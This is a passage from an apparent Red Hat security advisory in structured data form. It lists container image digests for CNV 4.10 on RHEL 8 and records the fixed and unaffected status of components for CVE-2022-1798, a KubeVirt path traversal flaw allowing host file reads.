relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", 